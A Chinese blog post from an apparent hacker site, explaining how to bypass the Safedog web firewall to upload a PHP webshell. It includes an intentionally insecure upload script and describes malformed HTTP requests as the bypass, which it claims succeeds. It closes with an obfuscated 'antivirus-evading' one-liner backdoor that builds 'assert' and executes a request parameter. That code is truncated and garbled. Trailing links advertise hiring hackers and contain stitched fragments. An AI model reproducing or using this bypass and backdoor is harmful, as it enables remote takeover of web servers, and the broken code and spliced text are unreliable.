绕过网站安全狗阻拦,上传Webshell技巧总结(附免杀PHP一句话)

访客5年前黑客工具483

这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的办法。
思路是:修正HTTP恳求,构成变形HTTP恳求,然后绕过网站安全狗的检测。
废话不多说,切入正题。。。。
1、试验环境:
Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.12048
2、用于文件上传的PHP源码:
 $path = dirname(__FILE__) . '/upload/';
 $rand = rand(0,30);
 move_uploaded_file($_FILES["file"]["tmp_name"],$path . $rand . $_FILES["file"]["name"]);
 echo "File Path:" . $path . $rand . $_FILES["file"]["name"] . "";
 echo "OK";
?>
由于此次试验的意图是绕过网站安全狗,所以PHP源码上我没做任何检测,把上传的文件直接放在upload目录下。
3、先看一下正常的HTTP恳求:

 
很明显,文件名为”yijuhua.php”被阻拦。。。。
4、测验%00切断:

 
很明显,失利了。。。
5、修正HTTP恳求,结构变形HTTP恳求
(1)删去实体里边的Conten-Type字段:


绕过网站安全狗的阻拦,成功上传WebShell。。。
(2)删去Content-Disposition字段里的空格:

 


 
(3)修正Content-Disposition字段值的大小写:

 
6、菜刀衔接一句话:

 
到此,上传WebShell完毕,各位看理解了吗?
7、免杀PHP一句话:
 /*
 PHP一句话木马
 assert($string)
 */
 $arr = array('a','s','s','e','r','t');
 $func = '';
 for($i=0;$i
 $func .= $func . $arr[$i];
 }
 $func($_REQUEST['c']);
?>

 
8、修正缝隙:
呈现这种状况,我认为是网站安全狗在开发时没有考虑到变形HTTP恳求,而Apache却兼容变形HTTP恳求,所以可以上传成功。
 

相关文章

手机数据_怎么找有信誉的黑客-中国黑客联盟

$this->db->query("DELETE FROM ".DB_PREFIX."comment WHERE ip='$ip'");上传地址:manage/admin_flash.as...

手机怎么找人_找黑客攻破网络幸运彩票系统-网上怎么找信誉的黑客

「手机怎么找人_找黑客攻破网络幸运彩票系统-网上怎么找信誉的黑客」String method = this.helpers.analyzeRequest(baseRequestResponse)试验东...

父母都六十多了父亲经常出去赌博回来吵架家暴

Windows Server 2008 R2 Windows Server 2008 for x64-based Systems Service Pack 2需要开启ssl模块:a2enmod ssl...

压缩文件加密,怎么找黑帽黑客,找黑客帮忙删微信照片

作业进程 /// <param name="connection"></param>把它作为一个编码标准,能够协助团队里的新人防止遇到以上问题要害字:acblog...

有钱就能随心所欲?揭秘竞价排名背面的黑色产业链

万事不明白都有搜索引擎。在现代生活中搜索引擎成为了比百科全书更为全面的存在。但咱们不了解的是,每一条搜索成果背面,或许都是黑产演出的“实在扮演”。 搜索引擎再遭炮轰? 最近,六六在微博揭露炮轰国内搜索...

淘宝买家信誉,谁能联系网络黑客,找一部黑客的连续剧

创立一个带有POC文本的简略RTFb)无人机每7ms就会收到一次遥控器宣布的32字节操控数据,操控数据只要一条指令一种格局,一切操控杆和开关的状况会一次性发送到无人机。 无人机收到数据后会进行地址校验...